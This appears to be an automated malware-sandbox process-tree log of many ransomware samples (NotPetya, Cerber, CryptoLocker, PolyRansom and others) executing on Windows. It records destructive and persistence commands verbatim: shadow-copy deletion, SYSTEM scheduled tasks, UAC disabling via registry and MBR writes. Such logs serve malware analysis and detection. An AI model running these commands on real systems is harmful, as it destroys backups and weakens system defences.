C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 153⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\cmd.exe/c schtasks /Delete /F /TN rhaegal4⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /F /TN rhaegal5⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 593814106 && exit"4⤵PID:960
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 593814106 && exit"5⤵
- Creates scheduled task(s)
PID:1008
-
-
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 16:18:004⤵PID:3032
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 16:18:005⤵
- Creates scheduled task(s)
PID:9772
-
-
-
C:\Windows\54A.tmp"C:\Windows\54A.tmp" \\.\pipe\{F8C796A0-29C7-4B76-AB57-306BDE4E9410}4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:20272
-
-
-
-
C:\Users\Admin\AppData\Roaming\Birele.exe"C:\Users\Admin\AppData\Roaming\Birele.exe"2⤵
- Executes dropped EXE
PID:2844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 2483⤵
- Program crash
PID:3276
-
-
-
C:\Users\Admin\AppData\Roaming\Cerber5.exe"C:\Users\Admin\AppData\Roaming\Cerber5.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1156 -
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall set allprofiles state on3⤵
- Chimera
- Modifies Windows Firewall
PID:132
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall reset3⤵
- Modifies Windows Firewall
PID:20292
-
-
-
C:\Users\Admin\AppData\Roaming\CoronaVirus.exe"C:\Users\Admin\AppData\Roaming\CoronaVirus.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4368 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵PID:1124
-
C:\Windows\system32\mode.commode con cp select=12514⤵PID:7496
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:12492
-
-
-
-
C:\Users\Admin\AppData\Roaming\CryptoLocker.exe"C:\Users\Admin\AppData\Roaming\CryptoLocker.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Users\Admin\AppData\Roaming\CryptoLocker.exe"C:\Users\Admin\AppData\Roaming\CryptoLocker.exe" /w000002383⤵
- Executes dropped EXE
PID:4800
-
-
-
C:\Users\Admin\AppData\Roaming\CryptoWall.exe"C:\Users\Admin\AppData\Roaming\CryptoWall.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\syswow64\explorer.exe"3⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\SysWOW64\svchost.exe-k netsvcs4⤵PID:1844
-
-
-
-
C:\Users\Admin\AppData\Roaming\DeriaLock.exe"C:\Users\Admin\AppData\Roaming\DeriaLock.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Users\Admin\AppData\Roaming\Dharma.exe"C:\Users\Admin\AppData\Roaming\Dharma.exe"2⤵
- Executes dropped EXE
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe"C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe"3⤵
- Executes dropped EXE
PID:39236 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:21784
-
-
-
C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe"C:\Users\Admin\AppData\Local\Temp\ac\mssql.exe"3⤵PID:13068
-
-
C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe"C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe"3⤵PID:18076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ac\Shadow.bat" "3⤵PID:12008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ac\systembackup.bat" "3⤵PID:26968
-
-
-
C:\Users\Admin\AppData\Roaming\Fantom.exe"C:\Users\Admin\AppData\Roaming\Fantom.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"3⤵
- Executes dropped EXE
PID:7620
-
-
-
C:\Users\Admin\AppData\Roaming\GandCrab.exe"C:\Users\Admin\AppData\Roaming\GandCrab.exe"2⤵
- Executes dropped EXE
PID:1556
-
-
C:\Users\Admin\AppData\Roaming\InfinityCrypt.exe"C:\Users\Admin\AppData\Roaming\InfinityCrypt.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Checks processor information in registry
PID:896
-
-
C:\Users\Admin\AppData\Roaming\Krotten.exe"C:\Users\Admin\AppData\Roaming\Krotten.exe"2⤵
- Disables RegEdit via registry modification
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:4968
-
-
C:\Users\Admin\AppData\Roaming\NoMoreRansom.exe"C:\Users\Admin\AppData\Roaming\NoMoreRansom.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:480
-
-
C:\Users\Admin\AppData\Roaming\NotPetya.exe"C:\Users\Admin\AppData\Roaming\NotPetya.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:7368 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Windows\perfc.dat #13⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:39344 -
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 17:054⤵PID:14708
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 17:055⤵
- Creates scheduled task(s)
PID:6348
-
-
-
C:\Users\Admin\AppData\Local\Temp\D01.tmp"C:\Users\Admin\AppData\Local\Temp\D01.tmp" \\.\pipe\{D72EE11E-E885-49D4-A7D9-3C31714A2385}4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6944
-
-
-
-
C:\Users\Admin\AppData\Roaming\Petya.A.exe"C:\Users\Admin\AppData\Roaming\Petya.A.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:9724
-
-
C:\Users\Admin\AppData\Roaming\PolyRansom.exe"C:\Users\Admin\AppData\Roaming\PolyRansom.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:10000 -
C:\Users\Admin\CGgwAcgA\jOIoAokc.exe"C:\Users\Admin\CGgwAcgA\jOIoAokc.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:11896 -
C:\Windows\SysWOW64\taskkill.exetaskkill /FI "USERNAME eq Admin" /F /IM EMMAgEYw.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:24004
-
-
C:\ProgramData\sykUwIws\EMMAgEYw.exe"C:\ProgramData\sykUwIws\EMMAgEYw.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:12828
-
-
-
C:\ProgramData\sykUwIws\EMMAgEYw.exe"C:\ProgramData\sykUwIws\EMMAgEYw.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:12576 -
C:\Windows\SysWOW64\taskkill.exetaskkill /FI "USERNAME eq Admin" /F /IM jOIoAokc.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:26384
-
-
C:\Users\Admin\CGgwAcgA\jOIoAokc.exe"C:\Users\Admin\CGgwAcgA\jOIoAokc.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:12784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\PolyRansom"3⤵PID:26064
-
C:\Users\Admin\AppData\Roaming\PolyRansom.exeC:\Users\Admin\AppData\Roaming\PolyRansom4⤵
- Executes dropped EXE
PID:15100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\PolyRansom"5⤵PID:3320
-
C:\Users\Admin\AppData\Roaming\PolyRansom.exeC:\Users\Admin\AppData\Roaming\PolyRansom6⤵
- Executes dropped EXE
PID:6696 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\PolyRansom"7⤵PID:9528
-
C:\Users\Admin\AppData\Roaming\PolyRansom.exeC:\Users\Admin\AppData\Roaming\PolyRansom8⤵
- Adds Run key to start application
PID:11156 -
C:\Users\Admin\CGgwAcgA\jOIoAokc.exe"C:\Users\Admin\CGgwAcgA\jOIoAokc.exe"9⤵
- Adds Run key to start application
PID:22484 -
C:\Windows\SysWOW64\taskkill.exetaskkill /FI "USERNAME eq Admin" /F /IM EMMAgEYw.exe10⤵
- Kills process with taskkill
PID:3756
-
-
C:\ProgramData\sykUwIws\EMMAgEYw.exe"C:\ProgramData\sykUwIws\EMMAgEYw.exe"10⤵PID:8272
-
-
-
C:\ProgramData\sykUwIws\EMMAgEYw.exe"C:\ProgramData\sykUwIws\EMMAgEYw.exe"9⤵PID:18832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\PolyRansom"9⤵PID:8844
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 19⤵
- Modifies registry key
PID:27692
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 29⤵
- Modifies registry key
PID:11476
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f9⤵
- Modifies registry key
PID:5572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wQAgsgwA.bat" "C:\Users\Admin\AppData\Roaming\PolyRansom.exe""9⤵PID:10332
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 17⤵
- Modifies registry key
PID:9984
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 27⤵
- Modifies registry key
PID:6324
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
PID:9696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tgIgMIoU.bat" "C:\Users\Admin\AppData\Roaming\PolyRansom.exe""7⤵PID:5976
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs8⤵PID:12500
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 15⤵
- Modifies registry key
PID:3148
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 25⤵
- Modifies registry key
PID:3204
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
PID:2704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VWMIIowI.bat" "C:\Users\Admin\AppData\Roaming\PolyRansom.exe""5⤵PID:1700
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs6⤵PID:5628
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 13⤵
- Modifies registry key
PID:23872
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 23⤵
- Modifies registry key
PID:33336
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:12956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BqossMgA.bat" "C:\Users\Admin\AppData\Roaming\PolyRansom.exe""3⤵PID:10592
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs4⤵PID:3508
-
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"2⤵
- Executes dropped EXE
PID:11380 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵
- Executes dropped EXE
PID:12904 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Executes dropped EXE
PID:5648 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Executes dropped EXE
PID:6672 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10744
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7148
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21240
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:30280
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:21948
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5816
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21608
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13772
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:14380
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27616
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6032
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28724
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12040
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:35816
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5460
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:39000 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:9952
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15752
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:25744
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15028
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6176
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:7060 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10948
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:21076
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:39308
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"9⤵PID:25652
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:15216
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:20456
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵
- Writes to the Master Boot Record (MBR)
PID:21480 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:5660
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:27636
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:8664
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:28644
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:15996
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"9⤵PID:11056
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:35880
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:5464
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:31040
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:8696
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:32944
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:26096
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14936
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:6896
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:20648 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:2160
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:22076
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:4792
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21396
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:32128
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:11736
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:1136
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21764
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5644
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27724
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:13496
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:12428
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7728
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:35592 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:30792
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:22908
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14984
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7244
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:31792
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:2252
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:30440
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:11580
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:15184
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6928
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:5240 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10796
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7280
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21152
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:32440
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:20160
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5436
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:21584
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12800
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:3148
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14836
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5204
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:27528
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:30800
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:12084
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:20428
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:28696
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12776
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:25304
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"8⤵PID:26392
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:14908
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:7612
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵
- Writes to the Master Boot Record (MBR)
PID:35908 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:16428
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:5680
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:38076
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:12480
-
-
-
